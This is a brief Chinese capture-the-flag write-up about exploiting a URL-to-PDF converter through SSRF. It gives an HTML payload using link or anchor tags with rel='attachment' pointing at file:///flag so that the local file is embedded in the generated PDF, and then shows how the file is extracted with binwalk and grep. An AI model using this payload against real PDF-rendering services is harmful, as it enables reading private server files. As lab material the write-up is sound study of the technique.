输入URL。可以获得一个pdf
感觉是SSRF
google到了这么一篇文件
https://hackerone.com/reports/508123
在靶机上写个html文件
<html>
<body>
<link rel='attachment' href='file:///flag'>
</body>
</html>
还有<a rel='attachment' href='file:///flag'>也可以。
但我尝试用<img src="file:///flag">时就不行了。。。
然后binwalk提取下。cat *|grep -a flag